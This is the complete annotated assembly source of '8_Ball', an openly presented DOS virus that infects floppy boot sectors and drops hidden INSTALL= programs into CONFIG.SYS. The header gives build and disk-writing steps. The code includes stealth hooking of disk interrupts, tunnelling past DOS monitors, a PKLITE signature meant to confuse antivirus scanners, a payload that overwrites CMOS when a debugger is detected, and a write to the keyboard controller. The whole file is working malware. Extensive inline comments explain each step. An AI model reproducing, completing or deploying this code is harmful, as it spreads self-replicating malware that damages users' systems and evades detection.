designed by "Q" the misanthrope.
comment *
8_Ball is a multipartite, momentarily video-resident C:\CONFIG.SYS infector
that creates randomly named INSTALL= programs and is an HMA stealth memory
resident floppy boot sector infector. Virus scanners will not be able to
scan for this virus because it does not infect executable files. The payload
is an anti-debug routine that will blow the CMOS and still go memory resident
if debugged. It also will disable the keyboard key lock. It is an
improvement over Q_Ball. Also uses the PKLITE header confuser for TBAV and
AVP.
Example CONFIG.SYS:
BUFFERS=17
FILES=30
INSTALL=AOAN.MCO
tasm 8_ball /m2
tlink 8_ball
exe2bin 8_ball.exe 8_ball.com
format a:/q/u
debug 8_ball.com
l 300 0 0 1
w 100 0 0 1
w 300 0 20 1
m 11c,2fe 100
rcx
1e2
w
q
*
.286                                  ; 286 instruction set: pusha/popa and push-immediate are used below
qseg segment byte public 'CODE'
assume cs:qseg, es:qseg, ss:nothing, ds:qseg
; One 512-byte boot-sector image. `top` is byte 0 of the sector; the code
; below assumes the conventional BIOS load address 7C00h and uses that value
; (and 7E00h-2) as fixed offsets for its in-memory copies. Bytes 0..1Bh are a
; 2-byte jump, a NOP and a BIOS parameter block shaped like a 1.44 MB floppy;
; the virus body starts at com_install (offset 1Ch), and those same bytes are
; also the dropped .COM program (the header's debug script extracts them).
top: jmp short install                ; boot entry; next_line writes an equivalent 2-byte jump into victim sectors
db 90h
db 'MSDOS5.0'                         ; OEM name
dw 512                                ; bytes per sector
db 1                                  ; sectors per cluster
dw 1                                  ; reserved sectors
db 2                                  ; FAT copies (set_cx_dx hard-wires 2 rather than reading this)
dw 224                                ; root directory entries (read by set_cx_dx at [bx+11h])
dw 2880                               ; total sectors
db 0F0h                               ; media descriptor
dw 9                                  ; sectors per FAT (read at [bx+16h])
dw 18                                 ; sectors per track (read at [bx+18h])
dw 2                                  ; heads
; Entry point of the dropped .COM file (this label is file offset 0, load
; address 100h, DS = CS = PSP segment). It points INT 06h (invalid opcode)
; at next_part and then executes an invalid opcode, so control reaches
; next_part through the exception instead of a visible jump. next_part /
; go_mem_res come back to end_it to restore the vector and terminate.
com_install proc near
db "PK"                               ; 50h 4Bh = push ax / dec bx: harmless; mimics a PKLITE-style signature (header: "PKLITE header confuser")
mov ax, 3506h                         ; DOS: get INT 06h vector -> ES:BX
mov dx, next_part-com_install+0100h   ; DS:DX = next_part at its .COM load address
int 21h
mov ah, 25h                           ; DOS: set INT 06h := DS:DX (next_part); AX = 2506h is kept for end_it
int 21h
db 08dh, 0d3h                         ; LEA with a register source: invalid opcode on 286+ -> INT 06h -> next_part
end_it: push es                       ; reached from get_out with ES:DX = saved INT 06h vector, AX = 2506h
pop ds
int 21h                               ; restore INT 06h
int 20h                               ; terminate
com_install endp
; Boot-time installer, reached from `top` when an infected sector is booted.
; Assumes the BIOS entered at 0000:7C00 with BX = 7C00h (the ES:BX of the
; boot-sector read, not guaranteed by every BIOS): CS must be 0 for the
; BIOS-data-area probe, and BX is used as both the source offset and the
; destination offset. Makes two copies of the sector into video RAM
; (B800:7C00 and B800:7DFE, the header's "momentarily video resident"),
; hooks INT 1Ah to first_hook in the second copy, reloads the original boot
; sector over 0:7C00 and far-returns into it.
install proc near
push cs                               ; far return address 0:7C00 (CS, then BX) consumed by the final retf
mov si, bx                            ; SI = 7C00h: source offset of this sector
push bx
push cs
cld
pop ds                                ; DS = CS (= 0)
mov es, bx                            ; ES = BX; only kept on the `monochrome` path
cmp word ptr ds:[0449h], 07h          ; BIOS data area 40:49h (video mode byte) compared as a word against 7 (mono)
je monochrome
push 0b800h                           ; colour text-mode segment
pop es
cmp word ptr es:[si+negative_1-top+01h], -1   ; infection marker (the -1 immediate of `mov di,-1`) already at B800:7C00+..? ZF is kept alive until `je already_res`
monochrome: push es                   ; ES (video segment) becomes CS through `call return_far` + retf
push si
mov cx, offset previous_hook          ; 1FEh bytes: the sector minus its signature word
pop di                                ; DI = SI = 7C00h
push si
push cx
rep movsb                             ; copy #1: DS:7C00 -> ES:7C00
pop cx
pop si
call return_far                       ; near call to a retf: pops the return IP and the pushed ES, so execution continues here with CS = video segment
rep movsb                             ; copy #2: DS:7C00 -> ES:7DFE (DI was not reset); first_hook runs from this copy (+7E00h-2 offsets)
mov si, 1ah*04h                       ; INT 1Ah vector at 0:0068h
je already_res                        ; ZF from the marker compare above: already installed, do not re-hook
movsw                                 ; save the original INT 1Ah vector at ES:7FFC = previous_hook of copy #2 (far_jmp's operand there)
movsw
mov word ptr ds:[si-02h], cs          ; INT 1Ah := CS:first_hook (copy #2)
mov word ptr ds:[si-04h], offset first_hook+7e00h-02h
already_res: push ds
pop es                                ; ES = 0: buffer segment for the read below
re_get_boot: mov ax, 0201h            ; read 1 sector; also called from next_line as `push cs; call re_get_boot` so the retf returns far
call set_cx_dx                        ; CX/DX from the BPB at DS:BX, then INT 40h: original boot sector -> ES:BX (0:7C00)
return_far: retf                      ; here: pops BX (7C00h) and CS (0) pushed above -> runs the reloaded original sector
install endp
; INT 06h handler reached from com_install's invalid opcode. Anti-debug check:
; if the INT 01h (single-step) vector does not point at an IRET, a debugger is
; assumed and one CMOS RAM byte is overwritten (the header's "blow the CMOS");
; installation then continues either way ("still go memory resident if
; debugged") by falling through into go_mem_res.
next_part proc near
pop dx                                ; discard the exception frame's IP ...
pop dx                                ; ... and CS; the pushed flags stay for the popf in get_out
mov dx,bx                             ; DX = offset of the original INT 06h vector (BX from the 3506h call)
pusha                                 ; undone by get_out
negative_1: mov di, -1                ; the -1 immediate doubles as the infection marker checked by install/next_line; DI = -1 also makes the INT 2Fh allocation in go_mem_res fail if that call is not serviced
push es                               ; ES = segment of the original INT 06h vector
push ds
mov ax, 3501h                         ; DOS: get INT 01h vector -> ES:BX
int 21h
cmp byte ptr es:[bx], 00h             ; its immediate byte is overwritten by the next line (org $-1):
org $-1                               ;   effectively `cmp byte ptr es:[bx], 0CFh` — is the single-step handler a bare IRET?
iret                                  ; 0CFh, data only; not executed as an instruction on this path
mov al, 2eh                           ; AL = CMOS index 2Eh (flags unaffected)
je go_mem_res                         ; no debugger detected: skip the payload
out 70h, ax                           ; word OUT: AL -> port 70h (CMOS index), AH -> port 71h (CMOS data); writes AH (35h left from the 3501h call) into CMOS byte 2Eh
next_part endp
; Resident installation from the .COM: allocates 512 bytes in the HMA via
; INT 2Fh AX=4A02h, copies bytes 100h..2FFh of the program there, hooks
; INT 40h (floppy service) to interrupt_40 inside that copy, writes a
; keyboard-controller command byte (header: "disable the keyboard key lock")
; and leaves through end_it. Entered by fall-through from next_part, so the
; stack still holds DS, ES, the pusha frame and the exception flags.
go_mem_res proc near
mov ax, 3540h                         ; DOS: get INT 40h vector -> ES:BX
mov si, 0100h                         ; SI = com_install (copy source); 100h is also the word count used below
int 21h
mov word ptr ds:[previous_hook-com_install+0100h], bx   ; store the old INT 40h vector in this image's previous_hook slot (far_jmp's operand)
mov word ptr ds:[previous_hook-com_install+0102h], es
mov ax, es
inc ax                                ; ZF if the vector segment is FFFFh: already resident in the HMA
mov ax, 4a02h                         ; INT 2Fh AX=4A02h: allocate BX bytes of HMA (flags untouched)
jz get_out
mov bx, 0200h                         ; 512 bytes
int 2fh                               ; -> ES:DI; DI = FFFFh (or the -1 from next_part if unserviced) on failure
inc di                                ; DI = -1 -> 0 means failure; otherwise the copy lands at ES:(DI+1)
jz get_out
lea cx, word ptr ds:[si]              ; CX = 100h words
rep movsw                             ; copy 100h..2FFh into the HMA block; DI advances by 200h
push es
lea dx, word ptr ds:[di+interrupt_40-com_install-0200h]   ; DX = interrupt_40 within the HMA copy (undo the 200h advance)
mov ax, 2540h                         ; DOS: set INT 40h := DS:DX with DS = ES (HMA segment)
pop ds
int 21h
mov al,60h                            ; 8042 command 60h: write command byte ...
out 64h,al
get_status: in al,64h                 ; ... wait while status bit 1 (input buffer full) is set; CX (0 after rep movsw) bounds the loop
test al,02h
loopnz get_status
mov al,4bh                            ; new command byte 4Bh (the header describes this as disabling the keyboard lock)
out 60h,al
get_out: pop ds                       ; also the exit for the "already resident"/"no HMA" cases
pop es
popa
popf                                  ; flags pushed by the INT 06h exception
jmp end_it
go_mem_res endp
; Strings used by interrupt_21. file_name is a path buffer: DOS function 5Ah
; appends a generated name after "C:\", then a '.' is stored at `dot`
; (file_name+7) and CR/LF at `crlf` (file_name+11), and the run starting at
; install_name is written to CONFIG.SYS as "INSTALL=C:\xxxx.xxx\r\n".
; The equates are relative to $ = file_name+4 (just after the NUL).
install_name db 'INSTALL='
file_name db 'C:\'
db 00h
dot equ $+3                           ; file_name+7
crlf equ $+7                          ; file_name+11
config_line db "c:\config.sys",00     ; interrupt_21 switches between file_name and config_line by loading DL only, so both must share the same high address byte
; Compute the cylinder/sector (CX) and head (DH) of the sector used to hide
; the original boot sector, from the BPB at DS:BX, then issue the INT 40h
; request whose AH/AL/ES:BX/DL the caller prepared. Reads root-directory
; entries ([bx+11h]), sectors per FAT ([bx+16h]) and sectors per track
; ([bx+18h]); the FAT count is hard-wired as 2 and the head as 1, so the
; result only makes sense for floppy-like geometries where reserved + FATs +
; root directory ends within the first cylinder. With the BPB in `top` this
; gives CX = 000Fh, DH = 1 (the last root-directory sector).
; Clobbers BP, CX, DH and whatever INT 40h returns (AX, CF).
set_cx_dx proc near
mov bp, word ptr ds:[bx+11h]          ; root directory entries ...
shr bp, 04h                           ; ... / 16 = root directory sectors (32-byte entries, 512-byte sectors assumed)
mov cx, word ptr ds:[bx+16h]          ; sectors per FAT
shl cx, 01h                           ; x 2 FATs
add cx, bp
inc cx                                ; + boot sector: 1-based number of the last root-directory sector
sub cx, word ptr ds:[bx+18h]          ; minus one track = sector on head 1 (CH stays 0: cylinder 0)
mov dh, 01h                           ; head 1; DL (drive) is left as the caller set it
int 40h
retn
set_cx_dx endp
v_name db "8_Ball -=Q=-"              ; name string; not referenced by any code in this file
; Temporary INT 21h hook. first_hook installs it as interrupt_21+7C00h, so it
; runs from the FIRST video copy (B800:7C00..), while its string data is
; addressed in the second copy (+7E00h-2). On the first DOS call that is not
; EXEC (AH=4Bh) it: (1) clears the attributes of c:\config.sys, (2) obtains a
; unique file name in C:\ via function 5Ah and deletes that file, (3) creates
; the name with a '.' inserted at `dot` as hidden+read-only (CX=5) and writes
; the bytes from com_install of the first copy into it — the dropper .COM,
; (4) appends "INSTALL=<path>\r\n" to CONFIG.SYS, and (5) restores the
; original INT 21h vector. Every DOS call goes through INT 18h, which
; first_hook pointed at DOS's INT 21h entry, bypassing this hook and any
; other INT 21h monitor. Exits via pop_ds_and_all into this copy's far_jmp,
; whose operand (B800:7DFE) is the saved INT 21h vector.
interrupt_21 proc near
pushf
pusha
push ds
push cs
pop ds                                ; DS = video segment
cmp ah, 4bh                           ; EXEC: leave CONFIG.SYS alone, just unhook
je set_21_back
sub cx, cx                            ; attributes = 0
mov ax, 4301h                         ; DOS: set attributes of the file at DS:DX
mov dx, offset config_line+7e00h-02h  ; "c:\config.sys" in the second copy
int 18h
mov dl, low(offset file_name+7e00h-02h)   ; DX -> "C:\" (same high byte as config_line)
mov ah, 5ah                           ; DOS: create unique file in the directory at DS:DX (the generated name is appended to the buffer)
jc keep_trying                        ; attribute change failed (CF from the 4301h call): keep the hook and retry on a later INT 21h
int 18h                               ; -> AX = handle; file_name now holds "C:\" + generated name
mov bh, 3eh
xchg ax, bx                           ; BX = handle, AH = 3Eh: close
int 18h
mov ah, 41h                           ; delete it; only the unique name was wanted
int 18h
mov cl, 05h                           ; attributes: read-only + hidden
mov ax, 5b2eh                         ; AH = 5Bh create-new, AL = '.'
mov byte ptr ds:[dot+7e00h-02h], al   ; '.' after 4 characters of the generated name (e.g. "AOAN.MCO" in the header)
int 18h                               ; -> AX = handle
mov bh, 40h
xchg ax, bx                           ; BX = handle, AH = 40h: write
mov dx, offset com_install+7c00h      ; source: com_install in the first copy (B800:7C1C), which includes the saved INT 21h vector at 7DFEh as file bytes 1E2h..1E5h
mov ch, 02h                           ; CX = 02xxh: a little over one sector (CL presumably still 05h)
int 18h
mov ah, 3eh                           ; close the dropper
int 18h
mov dl, low(offset config_line+7c00h) ; NOTE(review): DH is still 7Eh, so DX = config_line+2 in the second copy, i.e. "\config.sys" on the current drive — verify
mov ax, 3d42h                         ; open, read/write, deny-none sharing
int 18h
xchg ax, bx                           ; BX = handle
mov ax, 4202h                         ; seek relative to end of file
cwd                                   ; DX = 0
sub cx, cx                            ; CX:DX = 0
int 18h
mov word ptr ds:[crlf+7e00h-02h], 0a0dh   ; CR LF over the last character of the name and its NUL
mov ah, 40h                           ; write "INSTALL=" + path + CR LF
mov dx, offset install_name+7e00h-02h
mov cl, low(crlf-install_name+02h)    ; 8 + 11 + 2 = 21 bytes (CH = 0)
int 18h
mov ah, 3eh                           ; close CONFIG.SYS
int 18h
set_21_back: lds dx, dword ptr ds:[previous_hook+7c00h]   ; original INT 21h vector, saved by first_hook at B800:7DFE
mov ax, 2521h                         ; DOS: set INT 21h := DS:DX
int 18h
keep_trying: jmp pop_ds_and_all       ; restore registers, then fall into far_jmp -> original INT 21h handles the intercepted call
interrupt_21 endp
; Infection/stealth worker called by interrupt_40 after a successful read of
; cylinder 0 / head 0 / sector 1 into ES:BX. It never returns to its caller:
; it pops the return address (to locate this image's com_install in CS,
; which keeps the routine position-independent) and finishes the INT 40h
; frame itself with `retf 02h`.
;  - buffer not yet infected (marker word != -1): write the clean sector to
;    the location computed by set_cx_dx, overlay the virus body
;    (com_install..previous_hook) on bytes 1Ch.. of the buffer, patch its
;    first two bytes into a jump to install, and write it back as sector 1;
;  - then (and also when it was already infected) re-read the clean sector
;    into the caller's buffer, so the caller never sees the virus (stealth).
next_line proc near
pop ax                                ; AX = return_point in this copy
add ax, -(return_point-com_install)   ; AX = com_install in this copy
xchg ax, si                           ; SI = com_install
push ds                               ; popped at get_old_bs
push es
pop ds                                ; DS = ES = buffer segment
cmp word ptr ds:[bx+negative_1-top+01h], -1   ; infection marker already in the buffer?
je get_old_bs
mov ax, 0301h                         ; write 1 sector
pusha                                 ; keep the caller's CX/DX (C0/H0/S1 + drive) for the second write
call set_cx_dx                        ; clean sector -> hiding location (CX/DX from the buffer's BPB, DL = drive)
cld
mov cx, previous_hook-com_install     ; 1E2h bytes
lea di, word ptr ds:[bx+com_install-top]   ; buffer + 1Ch: the victim's own jump/OEM/BPB stay in place
rep movs byte ptr es:[di], cs:[si]    ; overlay the body from this copy
mov word ptr ds:[bx], 0000h           ; the 2-byte immediate is replaced by the next line (org $-2):
org $-2                               ;   a short jmp, so the buffer's first two bytes become a jump to install,
jmp $(install-top)                    ;   meant to match the `jmp short install` at `top` (check how TASM evaluates this operand); never executed here
popa                                  ; AX = 0301h, CX/DX = the caller's C0/H0/S1
int 40h                               ; write the infected sector back (AH = 3, so interrupt_40 passes it through)
get_old_bs: push cs
call re_get_boot                      ; near call + the retf there: clean sector -> ES:BX (the caller's buffer)
pop ds
popa                                  ; interrupt_40's pusha
popf                                  ; interrupt_40's pushf
return_far_2: retf 02h                ; back to the INT 40h caller, dropping the flags the INT pushed so the current CF is what it sees
next_line endp
; INT 40h (floppy service) hook installed by go_mem_res in the HMA copy.
; Passes everything straight through except AH=02h reads with CX=0001h and
; DH=0 (cylinder 0, head 0, sector 1: the boot sector). Those are first
; performed through the original vector; on success next_line infects/hides,
; on error the call returns with the original handler's flags.
interrupt_40 proc near
cmp cx, 0001h                         ; CH = 0 (cylinder 0), CL = 1 (sector 1)
jne jne_far_jmp
cmp ah, 02h                           ; read
jne jne_far_jmp
cmp dh, ch                            ; head 0 (CH is 0 here)
jne_far_jmp: jne far_jmp              ; the earlier jne's land on this jne and re-test the same, still clear, ZF
pushf                                 ; emulate an INT: flags, CS, near return ...
push cs
call far_jmp                          ; ... the original handler's IRET comes back here
jc return_far_2                       ; read failed: `retf 02h` with the current flags
pushf
pusha                                 ; both are popped inside next_line before its retf 02h
call next_line                        ; does not return; its `pop ax` picks up return_point
return_point label byte
interrupt_40 endp
org 001c2h                            ; fixed position: install stores first_hook+7E00h-2 as the INT 1Ah offset
; INT 1Ah hook set by install; runs from the second video copy (CS = video
; segment) on every INT 1Ah call while DOS boots. Once the DOS multiplex
; installation check reports DOS present it: restores INT 1Ah, copies the
; current INT 21h vector into INT 18h (so interrupt_21 can call DOS without
; passing through INT 21h hooks), saves that INT 21h vector at
; CS:previous_hook+7C00h (B800:7DFE = far_jmp's operand in the first copy),
; and points INT 21h at interrupt_21 in the first copy. Ends by falling
; through into far_jmp, whose operand in this copy is the original INT 1Ah.
first_hook proc near
pushf
pusha
mov ax, 1200h                         ; INT 2Fh AX=1200h: DOS installation check (AL = FFh when installed)
push ds
push es
cwd                                   ; DX = 0 (AX is positive): vector-table segment
int 2fh
inc al                                ; ZF if AL was FFh
mov ds, dx                            ; DS = 0 (assumes the INT 2Fh call left DX alone)
mov si, 21h*04h                       ; INT 21h vector at 0:0084h
mov di, offset previous_hook+7c00h    ; B800:7DFE: save slot for the INT 21h vector
jnz pop_it                            ; DOS not up yet: chain to the old INT 1Ah and wait for a later call
les bx, dword ptr cs:[previous_hook+7e00h-02h]   ; original INT 1Ah vector (stored there by install)
mov ds:[si-((21h-1ah)*04h)+2], es     ; INT 1Ah := original
mov ds:[si-((21h-1ah)*04h)], bx
les bx,dword ptr ds:[si]              ; current INT 21h vector
mov ds:[si-((21h-18h)*04h)+2], es     ; INT 18h := INT 21h (DOS entry used by interrupt_21)
push cs
cld
mov ds:[si-((21h-18h)*04h)], bx
pop es                                ; ES = CS
movsw                                 ; save the INT 21h vector at ES:DI (previous_hook+7C00h)
movsw
mov word ptr ds:[si-04h], offset interrupt_21+7c00h   ; INT 21h := CS:interrupt_21 in the FIRST copy
mov word ptr ds:[si-02h], cs
pop_it: pop es
pop_ds_and_all: pop ds                ; shared exit, also used by interrupt_21 (keep_trying)
popa
popf
first_hook endp                       ; falls through into far_jmp at 1FCh
org 001fch                            ; last 4 bytes of the sector: sti, EAh, signature word
; Shared tail: every handler in this image ends here (first_hook and
; interrupt_21 by fall-through from pop_ds_and_all, interrupt_40 by jne/call).
; `jmp far` with an inline 4-byte operand at previous_hook, which each
; resident copy fills with the vector it replaced: INT 1Ah in the second video
; copy (install), INT 21h in the first video copy (first_hook), INT 40h in
; the HMA copy (go_mem_res). The operand overlaps boot_signature (bytes
; 1FEh-1FFh) plus two bytes past the end of the sector, so 0AA55h is only the
; on-disk value.
far_jmp proc near
sti
db 0eah                               ; opcode: jmp far ptr imm16:imm16
previous_hook: label double           ; the operand; also the save slot addressed elsewhere with -com_install / +7C00h / +7E00h-2 offsets
far_jmp endp
boot_signature dw 0aa55h              ; valid-boot-sector marker; shares bytes 1FEh-1FFh with previous_hook
qseg ends
end